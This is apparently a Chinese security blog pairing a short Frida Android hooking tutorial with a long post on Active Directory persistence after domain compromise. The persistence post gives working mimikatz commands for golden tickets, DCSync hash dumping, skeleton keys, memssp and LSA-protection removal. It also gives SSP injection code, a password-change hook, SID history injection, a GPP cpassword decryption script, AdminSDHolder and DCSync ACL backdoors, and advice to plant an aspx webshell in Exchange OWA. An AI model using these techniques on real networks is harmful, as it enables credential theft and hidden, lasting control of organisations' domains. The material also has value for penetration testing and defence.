2019-12-06T02:35:37.000Z

frida安装

frida-12.7.24、frida-tools-5.3.0

1 2	pip install frida -i https://pypi.douban.com/simple --trusted-host pypi.douban.com pip install frida-tools -i https://pypi.douban.com/simple --trusted-host pypi.douban.com

frida-server

https://github.com/frida/frida/releases

虚拟机

frida-server-12.7.24-android-x86
frida-server-12.7.24-android-x86_64

真机

frida-server-12.7.24-android-arm
frida-server-12.7.24-android-arm64

AndoridKiller

用于查看Android日志、进程、文件等等。

frida启动

启动frida-server

adb push frida-server-12.7.24-android-x86 /data/local/tmp/
adb shell
cd /data/local/tmp
chmod 777 frida-server-12.7.24-android-x86
./frida-server-12.7.24-android-x86

启动转发

1 2	adb forward tcp:27042 tcp:27042 adb forward tcp:27043 tcp:27043

Androidkiller adb连接

> adb.exe devices
List of devices attached
127.0.0.1:62026 device

> adb.exe connect 127.0.0.1:62026
adb server version (32) doesn't match this client (36); killing...
* daemon started successfully *
connected to 127.0.0.1:62026

frida脚本

import time
import sys
import frida

js_code ='''
    console.log("Script loaded successfully ");
    Java.perform(function x() { //Silently fails without the sleep from the python code
    console.log("Inside java perform function");
    //get a wrapper for our class
    var my_class = Java.use("com.example.a11x256.frida_test.my_activity");
    //replace the original implmenetation of the function `fun` with our custom function
    my_class.fun.implementation = function (x, y) {
        //print the original arguments
        console.log("original call: fun(" + x + ", " + y + ")");
        //call the original implementation of `fun` with args (2,5)
        var ret_value = this.fun(2, 5);
        return ret_value;
    }
});
'''

device = frida.get_remote_device()
pid = device.spawn(["com.example.a11x256.frida_test"])
device.resume(pid)
time.sleep(1)  # Without it Java.perform silently fails
session = device.attach(pid)
script = session.create_script(js_code)
#with open("s1.js") as f:
#    script = session.create_script(f.read())
script.load()

# prevent the python script from terminating
sys.stdin.read()

sdevice.spawn(["com.example.a11x256.frida_test"])，要hook的进程包名com.yusakul.myapplication，get_remote_device()获取远程设备，如果是真机usb接入的话，可修改为函数get_usb_device()。
script = session.create_script(js_code)script.load()
创建加载js脚本。同时也可以通过外部js文件的方式加载
1
2
with open("s1.js") as f:
script = session.create_script(f.read())
js_code是hook脚本，为js脚本语言。

apk hook源码

package com.example.a11x256.frida_test;

import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;

public class my_activity extends AppCompatActivity {
    /* Access modifiers changed, original: protected */
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView((int) R.layout.activity_my_activity);
        while (true) {
            try {
                Thread.sleep(1000);
            } catch (InterruptedException e) {
                e.printStackTrace();
            }
            fun(50, 30);
        }
    }

    /* Access modifiers changed, original: 0000 */
    public void fun(int x, int y) {
        Log.d("Sum", String.valueOf(x + y));
    }
}

此App实现简单的运算，计算50+30并在日志中进行输出。而hook脚本的作用是用于打印原始参数console.log( "original call: fun("+ x + ", " + y + ")");。

并调用原函数，并传参2,5。将函数执行结果返回。

1 2	var ret_value = this.fun(2, 5); return ret_value;

运行frida hook脚本

APP正常运行是输出50+30的结果。

运行hook脚本

日志输出为hook脚本的给的参数，并在脚本中输出原始参数值。

域渗透-域维权

2019-09-11T14:17:17.000Z

黄金票据

简介

Golden Ticket（下面称为金票）是通过伪造的TGT（TicketGranting Ticket），因为只要有了高权限的TGT，那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。

制作金票的条件：

1、域名称
2、域的SID值
3、域的KRBTGT账户密码HASH
4、伪造用户名，可以是任意的

利用过程

金票的生成需要用到krbtgt的密码HASH值，可以通过mimikatz中的

1	lsadump::dcsync /OWA2010SP3.0day.org /user:krbtgt

命令获取krbtgt的值。

得到KRBTGT HASH之后使用mimikatz中的kerberos::golden功能生成金票golden.kiribi，即为伪造成功的TGT。

参数说明：

/admin：伪造的用户名
/domain：域名称
/sid：SID值，注意是去掉最后一个-后面的值
/krbtgt：krbtgt的HASH值
/ticket：生成的票据名称

1	kerberos::golden /admin:administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:golden.kiribi

通过mimikatz中的kerberos::ptt功能（Pass The Ticket）将golden.kiribi导入内存中。

1
2
3

kerberos::purge
kerberos::ppt golden.kiribi
kerberos::list

此时就可以通过dir成功访问域控的共享文件夹。

1	dir \\OWA2010SP3.0day.org\c$

SSP密码记录

简介

SSP：Security Support Provider，直译为安全支持提供者，又名Security Package.

简单的理解为SSP就是一个DLL，用来实现身份认证。

SSPI：Security Support Provider Interface，直译为安全支持提供程序接口，是Windows系统在执行认证操作所使用的API。

简单的理解为SSPI是SSP的API接口

LSA：Local Security Authority，用于身份认证，常见进程为lsass.exe

特别的地方在于LSA是可扩展的，在系统启动的时候SSP会被加载到进程lsass.exe中.

这相当于我们可以自定义一个dll，在系统启动的时候被加载到进程lsass.exe。

如图，这是正常的SSPI结构图，Client APP是我们自定义的dll，通过Secur32.dll可以调用 “credential capture API“来获取LSA的信息

上图展示了攻击思路，既然可以自定义dll,那么我们就可以定制dll的功能，通过Named Pipe和Shared Memory直接获取lsass.exe中的明文密码，并且能够在其更改密码时立即获得新密码。

mimilib SSP

mimikatz早已支持这个功能，而这个文件就是我们使用的时候常常忽略的mimilib.dll

利用过程

方法一

添加SSP
将mimilib.dll复制到域控c:\windows\system32下

设置SSP

修改域控注册表位置：

1	HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Security Packages\

3.重启系统

域控重启后在c:\windows\system32可看到新生成的文件kiwissp.log

方法二：使用API AddSecurityPackage

(1)复制文件

同方法1

(2)修改注册表

同方法1

(3)调用AddSecurityPackage

测试代码如下：

   #define SECURITY_WIN32
   
   #include 
   #include 
   #include 
   #pragma comment(lib,"Secur32.lib")
   
   
   int main(int argc, char **argv) {
   SECURITY_PACKAGE_OPTIONS option;
   option.Size = sizeof(option);
   option.Flags = 0;
   option.Type = SECPKG_OPTIONS_TYPE_LSA;
   option.SignatureSize = 0;
   option.Signature = NULL;
   SECURITY_STATUS SEC_ENTRYnRet = AddSecurityPackageA("mimilib", &option);
   printf("AddSecurityPackage return with 0x%X\n", SEC_ENTRYnRet);
}

添加成功，如果此时输入了新的凭据(例如runas，或者用户锁屏后重新登录)，将会生成文件kiwissp.log

方法2的自动化实现：

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/persistence/Install-SSP.ps1

方法3：使用RPC控制lsass加载SSP

XPN开源的代码：

https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e

测试如下图

添加成功

优点：

不需要写注册表
不调用API AddSecurityPackage
不需要对lsass进程的内存进行写操作
lasss进程中不存在加载的dll

Memory Updating of SSPs

mimikatz同时还支持通过内存更新ssp，这样就不需要重启再获取账户信息

需要使用mimikatz.exe，命令如下：

1 2	privilege::debug misc::memssp

通过修改lsass进程的内存，实现从lsass进程中提取凭据

命令执行后，如果此时输入了新的凭据(例如runas，或者用户锁屏后重新登录)，将会在c:\windows\system32下生成文件mimilsa.log

Skeleton Key

Skeleton Key是一种不需要域控重启即能生效的维持域控权限方法。

简介

Skeleton Key被安装在64位的域控服务器上
支持Windows Server2003—Windows Server2012 R2
能够让所有域用户使用同一个万能密码进行登录
现有的所有域用户使用原密码仍能继续登录
重启后失效
支持 Skeleton Key

利用过程

在域控安装Skeleton Key

mimikatz命令：

1 2	privilege::debug misc::skeleton

域内主机使用Skeleton Key登录域控

mimikatz的默认Skeleton Key设置为mimikatz

1 2	net use \\OWA2010SP3.0day.org mimikatz /user:administrator@0day.org dir \\OWA2010SP3.0day.org\c$

Skeleton Key只是给所有账户添加了一个万能密码，无法修改账户的权限

绕过LSA Protection

配置LSA Protection

注册表位置：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

新建-DWORD值，名称为RunAsPPL,数值为00000001

重启系统

使用mimidrv.sys绕过

mimikatz命令：

privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton

绕过cmd、regedit、taskmgr

privilege::debug
misc::cmd
misc::regedit
misc::taskmgr

Hook PasswordChangeNotify

简介

Hook PasswordChangeNotify这个概念最早是在2013年9月15日由clymb3r提出，通过Hook PasswordChangeNotify拦截修改的帐户密码。

需要了解的相关背景知识如下：

在修改域控密码时会进行如下同步操作：
a. 当修改域控密码时，LSA首先调用PasswordFileter来判断新密码是否符合密码复杂度要求
b. 如果符合，LSA接着调用PasswordChangeNotify在系统上同步更新密码
函数PasswordChangeNotify存在于rassfm.dll
rassfm.dll可理解为Remote Access Subauthentication dll，只存在于在Server系统下，xp、win7、win8等均不存在

Hook PasswordChangeNotify有如下优点：

不需要重启
不需要修改注册表
甚至不需要在系统放置dll

利用过程

实现Hook PasswordChangeNotify共包含两部分：Hook dll和dll注入。

https://github.com/3gstudent/Hook-PasswordChangeNotify

编译工程，生成HookPasswordChange.dll

MFC设置为在静态库中使用MFC

上传HookPasswordChangeNotify.ps1和HookPasswordChange.dll到域控主机

管理员权限执行：

1	PowerShell.exe -ExecutionPolicy Bypass -File HookPasswordChangeNotify.ps1

手动修改域控密码后
在C:\Windows\Temp下可以找到passwords.txt，其中记录了新修改的密码。

自定义dll代码实现更多高级功能，如自动上传新密码。

以下链接中的代码可作为参考，其中实现了将获取的新密码上传至Http服务器

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

DSRM同步指定域用户

DSRM密码同步

Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步，Windows Server 2003不支持DSRM密码同步。

利用如下命令：

C:\Users\Administrator>ntdsutil
ntdsutil: set DSRM password
Reset DSRM Administrator Password: SYNC FROM DOMAIN ACCOUNT test
Password has been synchronized successfully.

同步之后使用mimikatz查看test用户和SAM中Administrator的NTLM值。如下图所示，可以看到两个账户的NTLM值相同，说明确实同步成功了。

1 2	privilege::debug lsadump::lsa /name:test /inject

1
2
3

privilege::debug
token::elevate
lsadump::sam

修改注册表允许DSRM账户远程访问

修改注册表 HKLM\System\CurrentControlSet\Control\Lsa 路径下的 DSRMAdminLogonBehavior 的值为2。

PS：系统默认不存在DSRMAdminLogonBehavior，手动添加。

DSRM账户是域控的本地管理员账户，并非域的管理员帐户。所以DSRM密码同步之后并不会影响域的管理员帐户。另外，在下一次进行DSRM密码同步之前，NTLM的值一直有效。所以为了保证权限的持久化，尤其在跨国域或上百上千个域的大型内网中，最好在事件查看器的安全事件中筛选事件ID为4794的事件日志，来判断域管是否经常进行DSRM密码同步操作。

SID history

SID history是支持迁移方案的属性。每个用户帐户都有一个关联的安全标识符（SID），用于跟踪安全主体和连接到资源时的帐户及访问权限。SID历史记录允许另一个帐户的访问被有效的克隆到另一个帐户。这是非常有用的，其目的是确保用户在从一个域移动（迁移）到另一个域时能保留原有的访问权限。由于在创建新帐户时用户的SID会发生更改，旧的SID需要映射到新的帐户。当域A中的用户迁移到域B时，将在DomainB中创建新的用户帐户，并将DomainA用户的SID添加到DomainB的用户帐户的SID历史记录属性中。这样就可以确保DomainB用户仍可以访问DomainA中的资源。

Mimikatz支持SID历史注入到任何用户帐户（需要域管理员或等效的权限）。在这种情况下，攻击者创建用户帐户“test”，并将该域的默认管理员帐户“Administrator”（RID 500）添加到帐户的SID历史记录属性中。

1 2	privilege::debug sid::add /new:[DomainAdmin's SID or NAME] /sam:[CommonUserNAME]

当test登录时，将对与该帐户相关联的SID进行评估，并根据这些SID来确定访问权限。由于test帐户与Administrator帐户（RID 500）相关联，因此，test帐户具有Administrator帐户的所有访问权限，包括域管理员权限。

GPO[组策略]后门

利用SYSVOL还原组策略中保存的密码

使用Group Policy Preferences配置组策略批量修改用户本地管理员密码。

开始-管理工具-组策略管理

选择域，创建GP0

设置名称为test

test-设置-右键-编辑-用户配置-首选项-控制面板设置-本地用户和组

更新，administrator(内置),设置密码

委派，设置权限

在详细一栏，可看到该策略对应的ID为{05F24259-49D8-481A-8408-567DC3155838}

组策略配置完成，域内主机重新登录，即可应用此策略

在对应的文件夹下能找到配置文件Groups.xml，具体路径如下：

1	\\0day.org\SYSVOL\0day.org\Policies\{05F24259-49D8-481A-8408-567DC3155838}\User\Preferences\Groups

Groups.xml内容如下：

1
2
3

cpassword项，保存的是加密后的内容"Hd/xxCN9bFRTj8C2az+0t3el0u3Dn68pZ1Sd4IHmbPw"

加密方式为AES 256，虽然目前AES 256很难被攻破，但是微软选择公开了该AES 256加密的私钥，地址如下：

https://msdn.microsoft.com/en-us/library/cc422924.aspx

借助该私钥，我们就能还原出明文

采用Chris Campbell @obscuresec开源的powershell脚本，地址如下：

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1

该脚本可在域内主机上执行，能够自动查询共享文件夹\SYSVOL中的文件。

也可以利用如下代码进行解密

#!/usr/bin/python
import sys
from Crypto.Cipher import AES
from base64 import b64decode

if(len(sys.argv) != 2):
  print "decrypt.py "
  sys.exit(0)

key = """4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b""".decode('hex')
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
out = AES.new(key, AES.MODE_CBC, "\x00" * 16)
out = out.decrypt(password)
print out[:-ord(out[-1])].decode('utf16')

通过Group Policy Management Console (GPMC) 实现计划任务的远程执行

同上创建GPO，在计划任务中添加。

第四个任务选项会在每次组策略刷新时执行。

四种计划任务的区别可参考官方文档：

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc770904(v%3dws.11)

对于域内的主机，可以等待90分钟使组策略自动更新，也可以在客户端执行如下命令强制刷新组策略：

1	gpupdate /force

DCSync

利用DCSync导出域内所有用户hash的方法

利用条件：

获得以下任一用户的权限：

Administrators组内的用户
Domain Admins组内的用户
Enterprise Admins组内的用户
域控制器的计算机帐户

导出域内所有用户的hash：

1	mimikatz.exe privilege::debug "lsadump::dcsync /domain:rootkit.org /all /csv" exit

利用DCSync在域内维持权限的方法

利用条件：

获得以下任一用户的权限：

Domain Admins组内的用户
Enterprise Admins组内的用户

利用原理：

向域内的一个普通用户添加如下三条ACE(Access Control Entries)：

DS-Replication-Get-Changes(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes-All(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
DS-Replication-Get-Changes(GUID:89e95b76-444d-4c62-991a-0facbeda640c)

该用户即可获得利用DCSync导出域内所有用户hash的权限。

Windows系统中的ACL(Access Control List)，用来表示用户（组）权限的列表。

利用方法：

利用PowerView.ps1，添加ACE的命令如下：

1	Add-DomainObjectAcl -TargetIdentity "DC=0day,DC=org" -PrincipalIdentity webadmin -Rights DCSync -Verbose

删除ACE的命令：

1	Remove-DomainObjectAcl -TargetIdentity "DC=0day,DC=org" -PrincipalIdentity webadmin -Rights DCSync -Verbose

在域内一台登录了sqladmin用户的主机上面，就能使用mimikatz的DCSync功能

1	mimikatz.exe privilege::debug "lsadump::dcsync /domain:0day.org /all /csv" exit

AdminSDHolder

AdminSDHolder是一个特殊的AD容器，具有一些默认安全权限，用作受保护的AD账户和组的模板

Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组，以防止意外和无意的修改并确保对这些对象的访问是安全的

如果能够修改AdminSDHolder对象的ACL，那么修改的权限将自动应用于所有受保护的AD账户和组，这可以作为一个域环境权限维持的方法

向AdminSDHolder对象添加ACL

使用PowerView，添加用户dbadmin 的完全访问权限

1	Add-ObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=rootkit,DC=org" -PrincipalIdentity dbadmin -Verbose -Rights All

默认等待60分钟以后，dbadmin获得对所有受保护的AD账户和组的完全访问权限

可以通过修改注册表的方式设置权限推送的间隔时间，注册表位置如下：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters,AdminSDProtectFrequency,REG_DWORD

例如修改成等待60秒的命令如下：

1	reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 60

dbadmin用户可以直接访问域控。

删除AdminSDHolder中指定用户的ACL

删除用户dbadmin的完全访问权限，命令如下

1	Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=rookit,DC=org" -PrincipalIdentity dbadmin -Rights All -Verbose

非常规方法

若域控主机为owa主机，即exchange服务器主机，我们可以在owa目录下留一个aspx的木马。用作维持权限。

在如下目录中加入一个aspx木马。

1	C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth